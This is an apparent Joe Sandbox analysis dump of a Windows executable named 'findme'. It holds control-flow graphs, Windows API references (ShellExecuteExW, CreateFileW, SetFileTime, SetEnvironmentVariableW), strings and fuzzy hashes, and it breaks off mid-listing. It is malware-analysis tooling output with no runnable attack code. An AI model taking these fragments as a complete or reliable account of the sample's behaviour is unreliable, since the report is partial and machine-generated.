                    control_flow_graph 561 4cd341-4cd378 call 4de28c call 4de360 call 4e15e8 568 4cd37a-4cd3a9 GetModuleFileNameW call 4cbc85 call 4cfe2e 561->568 569 4cd3ab-4cd3b4 call 4cfe56 561->569 572 4cd3b9-4cd3dd call 4c9619 call 4c99b0 568->572 569->572 580 4cd7a0-4cd7a6 call 4c9653 572->580 581 4cd3e3-4cd3eb 572->581 586 4cd7ab-4cd7bb 580->586 583 4cd3ed-4cd405 call 4d3781 * 2 581->583 584 4cd409-4cd438 call 4e5a90 * 2 581->584 595 4cd407 583->595 594 4cd43b-4cd43e 584->594 596 4cd56c-4cd58f call 4c9d30 call 4e35d3 594->596 597 4cd444-4cd44a call 4c9e40 594->597 595->584 596->580 606 4cd595-4cd5b0 call 4c9bf0 596->606 601 4cd44f-4cd476 call 4c9bf0 597->601 607 4cd47c-4cd484 601->607 608 4cd535-4cd538 601->608 622 4cd5b9-4cd5cc call 4e35d3 606->622 623 4cd5b2-4cd5b7 606->623 611 4cd4af-4cd4ba 607->611 612 4cd486-4cd48e 607->612 609 4cd53b-4cd55d call 4c9d30 608->609 609->594 625 4cd563-4cd566 609->625 614 4cd4bc-4cd4c8 611->614 615 4cd4e5-4cd4ed 611->615 612->611 617 4cd490-4cd4aa call 4e5ec0 612->617 614->615 619 4cd4ca-4cd4cf 614->619 620 4cd4ef-4cd4f7 615->620 621 4cd519-4cd51d 615->621 633 4cd4ac 617->633 634 4cd52b-4cd533 617->634 619->615 626 4cd4d1-4cd4e3 call 4e5808 619->626 620->621 627 4cd4f9-4cd513 call 4e5ec0 620->627 621->608 628 4cd51f-4cd522 621->628 622->580 639 4cd5d2-4cd5ee call 4d137a call 4e35ce 622->639 629 4cd5f1-4cd5f8 623->629 625->580 625->596 626->615 644 4cd527 626->644 627->580 627->621 628->607 636 4cd5fc-4cd625 call 4cfdfb call 4e35d3 629->636 637 4cd5fa 629->637 633->611 634->609 651 4cd627-4cd62e call 4e35ce 636->651 652 4cd633-4cd649 636->652 637->636 639->629 644->634 651->580 653 4cd64f-4cd65d 652->653 654 4cd731-4cd757 call 4cce72 call 4e35ce * 2 652->654 656 4cd664-4cd669 653->656 694 4cd759-4cd76f call 4d3781 * 2 654->694 695 4cd771-4cd79d call 4e5a90 * 2 654->695 659 4cd97c-4cd984 656->659 660 4cd66f-4cd678 656->660 664 4cd98a-4cd98e 659->664 665 4cd72b-4cd72e 659->665 662 4cd67a-4cd67e 660->662 663 4cd684-4cd68b 660->663 662->659 662->663 667 4cd880-4cd891 call 4cfcbf 663->667 668 4cd691-4cd6b6 663->668 669 4cd9de-4cd9e4 664->669 670 4cd990-4cd996 664->670 665->654 686 4cd976-4cd979 667->686 687 4cd897-4cd8c0 call 4cfe56 call 4e5885 667->687 674 4cd6b9-4cd6de call 4e35b3 call 4e5808 668->674 672 4cda0a-4cda2a call 4cce72 669->672 673 4cd9e6-4cd9ec 669->673 675 4cd99c-4cd9a3 670->675 676 4cd722-4cd725 670->676 698 4cda02-4cda05 672->698 673->672 679 4cd9ee-4cd9f4 673->679 712 4cd6f6 674->712 713 4cd6e0-4cd6ea 674->713 682 4cd9ca 675->682 683 4cd9a5-4cd9a8 675->683 676->656 676->665 679->676 689 4cd9fa-4cda01 679->689 688 4cd9cc-4cd9d9 682->688 692 4cd9aa-4cd9ad 683->692 693 4cd9c6-4cd9c8 683->693 686->659 687->686 721 4cd8c6-4cd93c call 4d1596 call 4cfdfb call 4cfdd4 call 4cfdfb call 4e58d9 687->721 688->676 689->698 700 4cd9af-4cd9b2 692->700 701 4cd9c2-4cd9c4 692->701 693->688 694->695 695->580 706 4cd9be-4cd9c0 700->706 707 4cd9b4-4cd9b8 700->707 701->688 706->688 707->679 714 4cd9ba-4cd9bc 707->714 719 4cd6f9-4cd6fd 712->719 713->712 718 4cd6ec-4cd6f4 713->718 714->688 718->719 719->674 720 4cd6ff-4cd706 719->720 722 4cd70c-4cd71a call 4cfdfb 720->722 723 4cd7be-4cd7c1 720->723 753 4cd93e-4cd947 721->753 754 4cd94a-4cd95f 721->754 728 4cd71f 722->728 723->667 727 4cd7c7-4cd7ce 723->727 730 4cd7d6-4cd7d7 727->730 731 4cd7d0-4cd7d4 727->731 728->676 730->727 731->730 733 4cd7d9-4cd7e7 731->733 735 4cd808-4cd830 call 4d1596 733->735 736 4cd7e9-4cd7ec 733->736 743 4cd832-4cd84e call 4e35e9 735->743 744 4cd853-4cd85b 735->744 737 4cd7ee-4cd803 736->737 738 4cd805 736->738 737->736 737->738 738->735 743->728 747 4cd85d 744->747 748 4cd862-4cd87b call 4cdd6b 744->748 747->748 748->728 753->754 756 4cd960-4cd967 754->756 757 4cd969-4cd96d 756->757 758 4cd973-4cd974 756->758 757->728 757->758 758->756
                    APIs
                    • __EH_prolog.LIBCMT ref: 004CD346
                    • _wcschr.LIBVCRUNTIME ref: 004CD367
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,004CD328,?), ref: 004CD382
                    • __fprintf_l.LIBCMT ref: 004CD873
                      • Part of subcall function 004D137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,004CB652,00000000,?,?,?,00010434), ref: 004D1396
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                    • String ID: $ ,$$%s:$$9O$*messages***$*messages***$@%s:$R$RTL$a
                    • API String ID: 4184910265-4228914716
                    • Opcode ID: 370d7617ab7671b7d48b5b36472d07c1eb76f1f61a2642d6dfa0b34fe5bc232f
                    • Instruction ID: 8dcad8c829d9d8a989309773e107263e8067343b8e7f33a3474d86c28e65d9ae
                    • Opcode Fuzzy Hash: 370d7617ab7671b7d48b5b36472d07c1eb76f1f61a2642d6dfa0b34fe5bc232f
                    • Instruction Fuzzy Hash: 7312B5B9D00209AADB64EFA5CC45FEEB7B5EF04304F10407FE505A7291D7789A45CB28
                    Function 004DCB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004DAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004DAC85
                      • Part of subcall function 004DAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004DAC96
                      • Part of subcall function 004DAC74: IsDialogMessageW.USER32(00010434,?), ref: 004DACAA
                      • Part of subcall function 004DAC74: TranslateMessage.USER32(?), ref: 004DACB8
                      • Part of subcall function 004DAC74: DispatchMessageW.USER32(?), ref: 004DACC2
                    • GetDlgItem.USER32(00000068,0051ECB0), ref: 004DCB6E
                    • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,004DA632,00000001,?,?,004DAECB,004F4F88,0051ECB0), ref: 004DCB96
                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 004DCBA1
                    • SendMessageW.USER32(00000000,000000C2,00000000,004F35B4), ref: 004DCBAF
                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004DCBC5
                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 004DCBDF
                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004DCC23
                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 004DCC31
                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004DCC40
                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004DCC67
                    • SendMessageW.USER32(00000000,000000C2,00000000,004F431C), ref: 004DCC76
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                    • String ID: \
                    • API String ID: 3569833718-2967466578
                    • Opcode ID: 60e50c0ba97959e676da67cda5df183df13687e78a34f3e9fc84a4b1adcdb3d3
                    • Instruction ID: c916924561756b38b7dd27e62cb7adf1603208b1bbf22beeffbf130f52391ea9
                    • Opcode Fuzzy Hash: 60e50c0ba97959e676da67cda5df183df13687e78a34f3e9fc84a4b1adcdb3d3
                    • Instruction Fuzzy Hash: 9F31C471149742BBD311DF20DC4AFAF7FACEF92704F000509F69196291DB645A09E77A
                    Function 004DCE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 795 4dce22-4dce3a call 4de360 798 4dd08b-4dd093 795->798 799 4dce40-4dce4c call 4e35b3 795->799 799->798 802 4dce52-4dce7a call 4df350 799->802 805 4dce7c 802->805 806 4dce84-4dce91 802->806 805->806 807 4dce95-4dce9e 806->807 808 4dce93 806->808 809 4dced6 807->809 810 4dcea0-4dcea2 807->810 808->807 812 4dceda-4dcedd 809->812 811 4dceaa-4dcead 810->811 813 4dd03c-4dd041 811->813 814 4dceb3-4dcebb 811->814 815 4dcedf-4dcee2 812->815 816 4dcee4-4dcee6 812->816 819 4dd036-4dd03a 813->819 820 4dd043 813->820 817 4dd055-4dd05d 814->817 818 4dcec1-4dcec7 814->818 815->816 821 4dcef9-4dcf0e call 4cb493 815->821 816->821 822 4dcee8-4dceef 816->822 826 4dd05f-4dd061 817->826 827 4dd065-4dd06d 817->827 818->817 824 4dcecd-4dced4 818->824 819->813 825 4dd048-4dd04c 819->825 820->825 830 4dcf27-4dcf32 call 4ca180 821->830 831 4dcf10-4dcf1d call 4d17ac 821->831 822->821 828 4dcef1 822->828 824->809 824->811 825->817 826->827 827->812 828->821 837 4dcf4f-4dcf5c ShellExecuteExW 830->837 838 4dcf34-4dcf4b call 4cb239 830->838 831->830 836 4dcf1f 831->836 836->830 840 4dd08a 837->840 841 4dcf62-4dcf6f 837->841 838->837 840->798 843 4dcf71-4dcf78 841->843 844 4dcf82-4dcf84 841->844 843->844 845 4dcf7a-4dcf80 843->845 846 4dcf9b-4dcfba call 4dd2e6 844->846 847 4dcf86-4dcf8f 844->847 845->844 848 4dcff1-4dcffd CloseHandle 845->848 846->848 865 4dcfbc-4dcfc4 846->865 847->846 856 4dcf91-4dcf99 ShowWindow 847->856 849 4dcfff-4dd00c call 4d17ac 848->849 850 4dd00e-4dd01c 848->850 849->850 862 4dd072 849->862 854 4dd01e-4dd020 850->854 855 4dd079-4dd07b 850->855 854->855 860 4dd022-4dd028 854->860 855->840 859 4dd07d-4dd07f 855->859 856->846 859->840 863 4dd081-4dd084 ShowWindow 859->863 860->855 864 4dd02a-4dd034 860->864 862->855 863->840 864->855 865->848 866 4dcfc6-4dcfd7 GetExitCodeProcess 865->866 866->848 867 4dcfd9-4dcfe3 866->867 868 4dcfea 867->868 869 4dcfe5 867->869 868->848 869->868
                    APIs
                    • ShellExecuteExW.SHELL32(?), ref: 004DCF54
                    • ShowWindow.USER32(?,00000000), ref: 004DCF93
                    • GetExitCodeProcess.KERNEL32(?,?), ref: 004DCFCF
                    • CloseHandle.KERNEL32(?), ref: 004DCFF5
                    • ShowWindow.USER32(?,00000001), ref: 004DD084
                      • Part of subcall function 004D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004CBB05,00000000,.exe,?,?,00000800,?,?,004D85DF,?), ref: 004D17C2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                    • String ID: $.exe$.inf
                    • API String ID: 3686203788-2452507128
                    • Opcode ID: 9479ca97932cdb24463781a0c4e02b5a3864adfa679282996b97b3feb822bec3
                    • Instruction ID: d3c1ef0569d1cbfccefe371e3402fe406c6c138437b890fb3f6fdfa1479f2b3c
                    • Opcode Fuzzy Hash: 9479ca97932cdb24463781a0c4e02b5a3864adfa679282996b97b3feb822bec3
                    • Instruction Fuzzy Hash: C8612A70804381AAD7329F14D8646AB7BF5EFD1308F04481FF5C497391D779894ADB9A
                    Function 004EA058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 870 4ea058-4ea071 871 4ea087-4ea08c 870->871 872 4ea073-4ea083 call 4ee6ed 870->872 874 4ea08e-4ea096 871->874 875 4ea099-4ea0bd MultiByteToWideChar 871->875 872->871 879 4ea085 872->879 874->875 877 4ea0c3-4ea0cf 875->877 878 4ea250-4ea263 call 4dec4a 875->878 880 4ea123 877->880 881 4ea0d1-4ea0e2 877->881 879->871 883 4ea125-4ea127 880->883 884 4ea0e4-4ea0f3 call 4f1a30 881->884 885 4ea101-4ea112 call 4e8518 881->885 888 4ea12d-4ea140 MultiByteToWideChar 883->888 889 4ea245 883->889 884->889 898 4ea0f9-4ea0ff 884->898 885->889 895 4ea118 885->895 888->889 892 4ea146-4ea158 call 4ea72c 888->892 893 4ea247-4ea24e call 4ea2c0 889->893 900 4ea15d-4ea161 892->900 893->878 899 4ea11e-4ea121 895->899 898->899 899->883 900->889 902 4ea167-4ea16e 900->902 903 4ea1a8-4ea1b4 902->903 904 4ea170-4ea175 902->904 905 4ea1b6-4ea1c7 903->905 906 4ea200 903->906 904->893 907 4ea17b-4ea17d 904->907 908 4ea1c9-4ea1d8 call 4f1a30 905->908 909 4ea1e2-4ea1f3 call 4e8518 905->909 910 4ea202-4ea204 906->910 907->889 911 4ea183-4ea19d call 4ea72c 907->911 914 4ea23e-4ea244 call 4ea2c0 908->914 924 4ea1da-4ea1e0 908->924 909->914 926 4ea1f5 909->926 910->914 915 4ea206-4ea21f call 4ea72c 910->915 911->893 923 4ea1a3 911->923 914->889 915->914 927 4ea221-4ea228 915->927 923->889 928 4ea1fb-4ea1fe 924->928 926->928 929 4ea22a-4ea22b 927->929 930 4ea264-4ea26a 927->930 928->910 931 4ea22c-4ea23c WideCharToMultiByte 929->931 930->931 931->914 932 4ea26c-4ea273 call 4ea2c0 931->932 932->893
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004E4E35,004E4E35,?,?,?,004EA2A9,00000001,00000001,3FE85006), ref: 004EA0B2
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004EA2A9,00000001,00000001,3FE85006,?,?,?), ref: 004EA138
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004EA232
                    • __freea.LIBCMT ref: 004EA23F
                      • Part of subcall function 004E8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004EC13D,00000000,?,004E67E2,?,00000008,?,004E89AD,?,?,?), ref: 004E854A
                    • __freea.LIBCMT ref: 004EA248
                    • __freea.LIBCMT ref: 004EA26D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                    • String ID:
                    • API String ID: 1414292761-0
                    • Opcode ID: 39454bc39d4bc273225f064834f867e660a89428fc0dc701122d4cede30ea1b1
                    • Instruction ID: ebb69c4d16572f758995bd7d36ca3c08a3c82ae8cd150a407ea87c1a43c110d6
                    • Opcode Fuzzy Hash: 39454bc39d4bc273225f064834f867e660a89428fc0dc701122d4cede30ea1b1
                    • Instruction Fuzzy Hash: 59510672600246AFDB258F72CC41EBF77A9EB40755F15026AFD04E6340DB39EC60C66A
                    Function 004C99B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 935 4c99b0-4c99d1 call 4de360 938 4c99dc 935->938 939 4c99d3-4c99d6 935->939 941 4c99de-4c99fb 938->941 939->938 940 4c99d8-4c99da 939->940 940->941 942 4c99fd 941->942 943 4c9a03-4c9a0d 941->943 942->943 944 4c9a0f 943->944 945 4c9a12-4c9a31 call 4c70bf 943->945 944->945 948 4c9a39-4c9a57 CreateFileW 945->948 949 4c9a33 945->949 950 4c9a59-4c9a7b GetLastError call 4cb66c 948->950 951 4c9abb-4c9ac0 948->951 949->948 960 4c9a7d-4c9a9f CreateFileW GetLastError 950->960 961 4c9aaa-4c9aaf 950->961 952 4c9ae1-4c9af5 951->952 953 4c9ac2-4c9ac5 951->953 956 4c9af7-4c9b0f call 4cfe56 952->956 957 4c9b13-4c9b1e 952->957 953->952 955 4c9ac7-4c9adb SetFileTime 953->955 955->952 956->957 962 4c9aa5-4c9aa8 960->962 963 4c9aa1 960->963 961->951 964 4c9ab1 961->964 962->951 962->961 963->962 964->951
                    APIs
                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,004C78AD,?,00000005,?,00000011), ref: 004C9A4C
                    • GetLastError.KERNEL32(?,?,004C78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004C9A59
                    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,004C78AD,?,00000005,?), ref: 004C9A8E
                    • GetLastError.KERNEL32(?,?,004C78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004C9A96
                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,004C78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004C9ADB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: File$CreateErrorLast$Time
                    • String ID:
                    • API String ID: 1999340476-0
                    • Opcode ID: a59e5717953493a65450187dca62b7ebc885dc6aa82470e358c69121e0f473cd
                    • Instruction ID: af5f865d14ea39e52d42478d13a8be2eda4756acd7e8572fb865f52c61047e3d
                    • Opcode Fuzzy Hash: a59e5717953493a65450187dca62b7ebc885dc6aa82470e358c69121e0f473cd
                    • Instruction Fuzzy Hash: 564123755447867FE3209B20CC09FABBBD0AB01324F10071EE5A4962D0E779AD98CB99
                    Function 004DAC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 994 4dac74-4dac8d PeekMessageW 995 4dac8f-4daca3 GetMessageW 994->995 996 4dacc8-4daccc 994->996 997 4daca5-4dacb2 IsDialogMessageW 995->997 998 4dacb4-4dacc2 TranslateMessage DispatchMessageW 995->998 997->996 997->998 998->996
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004DAC85
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004DAC96
                    • IsDialogMessageW.USER32(00010434,?), ref: 004DACAA
                    • TranslateMessage.USER32(?), ref: 004DACB8
                    • DispatchMessageW.USER32(?), ref: 004DACC2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Message$DialogDispatchPeekTranslate
                    • String ID:
                    • API String ID: 1266772231-0
                    • Opcode ID: 0ba8e13a7248ad9530a58e5daea7bfdc0f4242ac7b383a80ac7e6add6a5e970a
                    • Instruction ID: f0ec54b01b1a0efe90c587843289858ab59a8c5d0e4299e1e117bbf69dfb9490
                    • Opcode Fuzzy Hash: 0ba8e13a7248ad9530a58e5daea7bfdc0f4242ac7b383a80ac7e6add6a5e970a
                    • Instruction Fuzzy Hash: A0F01D75902129BB8B309BE19C4CDEB7F6CEE16661B404416F905D3200EA28D40AD7B1
                    Function 004DA2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 999 4da2c7-4da2e6 GetClassNameW 1000 4da30e-4da310 999->1000 1001 4da2e8-4da2fd call 4d17ac 999->1001 1003 4da31b-4da31f 1000->1003 1004 4da312-4da315 SHAutoComplete 1000->1004 1006 4da30d 1001->1006 1007 4da2ff-4da30b FindWindowExW 1001->1007 1004->1003 1006->1000 1007->1006
                    APIs
                    • GetClassNameW.USER32(?,?,00000050), ref: 004DA2DE
                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 004DA315
                      • Part of subcall function 004D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004CBB05,00000000,.exe,?,?,00000800,?,?,004D85DF,?), ref: 004D17C2
                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 004DA305
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                    • String ID: EDIT
                    • API String ID: 4243998846-3080729518
                    • Opcode ID: 2bcf5aabc7fbf36cdb054488360eca580f863b35b7d0a74e9f4f7a4591aa715e
                    • Instruction ID: 13c7892a04d7d66b3ec3dc7260e732a33f079f14ea9c18cd5984ed0f0c7b3b50
                    • Opcode Fuzzy Hash: 2bcf5aabc7fbf36cdb054488360eca580f863b35b7d0a74e9f4f7a4591aa715e
                    • Instruction Fuzzy Hash: 91F0E236B0122877E7305A249C09FAB77AC9F46B00F440057BE04E2280D7689956C6FE
                    Function 004DA335 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004D0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004D00A0
                      • Part of subcall function 004D0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004CEB86,Crypt32.dll,00000000,004CEC0A,?,?,004CEBEC,?,?,?), ref: 004D00C2
                    • OleInitialize.OLE32(00000000), ref: 004DA34E
                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004DA385
                    • SHGetMalloc.SHELL32(00508430), ref: 004DA38F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                    • String ID: riched20.dll
                    • API String ID: 3498096277-3360196438
                    • Opcode ID: ec04f00c5ccea2bc9d5c1f7e27dce6ce014103ea35fbdcfb0951174a245157fd
                    • Instruction ID: 7b1b302b722116e90d137e67802afc3f12e8425e9d46e69c1c1011a9ebf71776
                    • Opcode Fuzzy Hash: ec04f00c5ccea2bc9d5c1f7e27dce6ce014103ea35fbdcfb0951174a245157fd
                    • Instruction Fuzzy Hash: BDF04475C0010DABDB20AF95D8499EFFBFCEF95305F00415BE814E2200CBB80505CBA1
                    Function 004DD287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1012 4dd287-4dd2b2 call 4de360 SetEnvironmentVariableW call 4cfbd8 1016 4dd2b7-4dd2bb 1012->1016 1017 4dd2bd-4dd2c1 1016->1017 1018 4dd2df-4dd2e3 1016->1018 1019 4dd2ca-4dd2d1 call 4cfcf1 1017->1019 1022 4dd2c3-4dd2c9 1019->1022 1023 4dd2d3-4dd2d9 SetEnvironmentVariableW 1019->1023 1022->1019 1023->1018
                    APIs
